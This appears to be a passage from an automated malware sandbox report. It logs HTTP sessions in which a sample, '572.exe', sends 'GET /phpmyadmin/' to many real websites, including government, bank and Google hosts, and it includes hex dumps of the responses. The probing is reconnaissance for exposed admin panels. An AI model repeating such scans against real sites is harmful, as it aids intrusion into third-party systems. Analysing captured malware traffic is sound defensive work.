                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_1816_2786379=nB8rDMrRxHTWIBA+arozGSvDwGUAAAAAM2AwV/yvpVYgUQE6hwe8qg==; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 50-20036917-20036927 NNNN CT(119 138 0) RT(1707131690602 937) q(0 0 2 -1) r(4 4) U24
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC689INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC556INData Raw: 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: dana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Serv


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                51192.168.2.655115184.25.164.103443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC183OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC233INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=10368000
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                52192.168.2.65485741.33.126.100443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC693INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 247
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS9c6b4a84027=08877083daab2000ac44398d65bad5d0bdc59cc1d9b57fbb99f306bf0b50b82167b0d9a8dad75642083fc86afe113000893558272290619731e1207d9a222244c7ab8c8b960f1cb19a8edcda5d9f384955a963ca891ae76ee9851a9660d5a38e; Path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TSe6c21afd027=08877083daab20004a20febb636adaec7a6b19607bdd857552a89be848c3bb11633258f4aa9872e60812369166113000294753b3ad9dbf7c31e1207d9a222244e921fff6ca7f28c72fe9b0132c3f3ceadcc33e740b0ae58ac570b6d13166dc9f; Path=/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC247INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 52 65 71 75 65 73 74 20 52 65 6a 65 63 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 72 65 6a 65 63 74 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 73 75 6c 74 20 77 69 74 68 20 79 6f 75 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 62 72 3e 3c 62 72 3e 59 6f 75 72 20 73 75 70 70 6f 72 74 20 49 44 20 69 73 3a 20 31 30 35 30 36 30 31 30 33 30 37 37 38 32 36 30 39 33 30 37 3c 62 72 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 27 3e 5b 47 6f 20 42 61 63 6b 5d 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>Request Rejected</title></head><body>The requested URL was rejected. Please consult with your administrator.<br><br>Your support ID is: 10506010307782609307<br><br><a href='javascript:history.back();'>[Go Back]</a></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                53192.168.2.655242172.67.148.124443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: loopex.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC733INHTTP/1.1 520
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 15
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mSVxWU8F8j9jYp5gMl%2BDPTbCxE9z0dLi0jYWlY%2B4%2BbIlSIFWNS0GBhNJbtuU6cGHVhxoqurRM2IMrby4AdxwJCQT3JYLCJzOcOwoUXh%2F9xO0Obbj0vQ4k%2F6dlSo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb722b0e249b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: error code: 520


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                54192.168.2.655173142.250.105.84443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC842INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1252INData Raw: 36 36 41 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 57 76 58 31 78 45 4d 78 66 32 6a 66 6e 4e 2d 78 68 5f 63 46 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IWvX1xEMxf2jfnN-xh_cFQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                55192.168.2.65518764.91.249.20443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC243INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC28INData Raw: 31 38 0d 0a 3c 68 31 3e 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 18<h1>404: Not Found</h1>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                56192.168.2.654596195.248.251.103443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: phonandroid.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC241INHTTP/1.1 301 Permanently moved
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Varnish
                                                                                                                                                                                                                                                                                                                                                                X-Varnish: 8926329
                                                                                                                                                                                                                                                                                                                                                                X-Redirected-By: lxc-varnish-ressources-02
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.phonandroid.com/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                57192.168.2.655175103.224.182.210443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC346INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: __tad=1707131692.7552465; expires=Thu, 02-Feb-2034 11:14:52 GMT; Max-Age=315360000
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/phpmyadmin/?sub1=20240205-2214-52da-a2cf-fa6f6140149e
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC2INData Raw: 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                58192.168.2.654782179.191.175.66443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:51 UTC189OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: servicossociais.caixa.gov.br
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC1141INHTTP/1.1 404 /phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzma=8f55a55a-7363-4fea-8cfb-4bc7616da5ed; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15768000
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: sameorigin
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzmb=1707131691; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzme=6987; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzmc=546391087875; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __uzmd=1707131691; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=D53D4170FC1C9713EE887CFA8C4A780E.crjpcaplux001_sisgr_inter_8087; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: cYZxyhvMuF66=v1jvZWgw__wwB; Expires=Mon, 05-Feb-2024 11:29:52 GMT; Path=/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC2955INData Raw: 31 66 66 38 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 43 61 69 78 61 20 45 63 6f 26 6f 63 69 72 63 3b 6e 6d 69 63 61 20 46 65 64 65 72 61 6c 20 2d 20 53 69 73 74 65 6d 61 20 49 6e 74 65 67 72 61 64 6f 20 64 65 20 53 65 67 75 72 61 6e 26 63 63 65 64 69 6c 3b 61 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 63 73 73 2f 6d 65 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1ff8<html><head><title>Caixa Eco&ocirc;nmica Federal - Sistema Integrado de Seguran&ccedil;a</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><link rel="stylesheet" type="text/css" href="css/men
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC4096INData Raw: 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 5f 6e 65 77 63 73 73 2f 68 6f 6d 65 5f 32 30 31 31 2f 68 6f 6d 65 5f 6c 6f 72 65 73 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 0d 0a 09 0d 0a 0d 0a 09 3c 4d 45 54 41 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 46 4f 4c 4c 4f 57 2c 49 4e 44 45 58 22 3e 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 68 6f 6d 65 5f 67 65 72 61 6c 22 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 68 6f 6d 65 5f 63 61 62 65 63 61 6c 68 6f 22 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 63 61 62 65 63 61 6c 68 6f 5f 32 30 31 31 5f 63 6f 6e 74 65 6e 74 22 3e 0d 0a 0d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: pe="text/css" href="_newcss/home_2011/home_lores.css" /><META name="ROBOTS" content="FOLLOW,INDEX"></head><body><div id="home_geral"><div id="home_cabecalho"><div id="cabecalho_2011_content">
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:52 UTC4096INData Raw: 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 20 62 6f 72 64 65 72 3a 30 70 78 22 3e 0d 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 67 65 6e 73 2f 69 6e 64 65 78 2f 61 6d 62 69 65 6e 74 65 2d 73 65 67 75 72 6f 2e 50 4e 47 22 20 61 6c 74 3d 22 56 6f 63 26 65 63 69 72 63 3b 20 65 73 74 26 61 61 63 75 74 65 3b 20 65 6d 20 75 6d 20 61 6d 62 69 65 6e 74 65 20 73 65 67 75 72 6f 22 20 74 69 74 6c 65 3d 22 56 6f 63 26 65 63 69 72 63 3b 20 65 73 74 26 61 61 63 75 74 65 3b 20 65 6d 20 75 6d 20 61 6d 62 69 65 6e 74 65 20 73 65 67 75 72 6f 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 30 70 78 22 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 0d 0a 09 09 3c 66 6f 72 6d 20 6e 61 6d 65 3d 22 52 65 64 69 72 65 63
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: x; margin-bottom:20px; border:0px"><img src="imagens/index/ambiente-seguro.PNG" alt="Voc&ecirc; est&aacute; em um ambiente seguro" title="Voc&ecirc; est&aacute; em um ambiente seguro" style="margin-left:-20px"></div><form name="Redirec
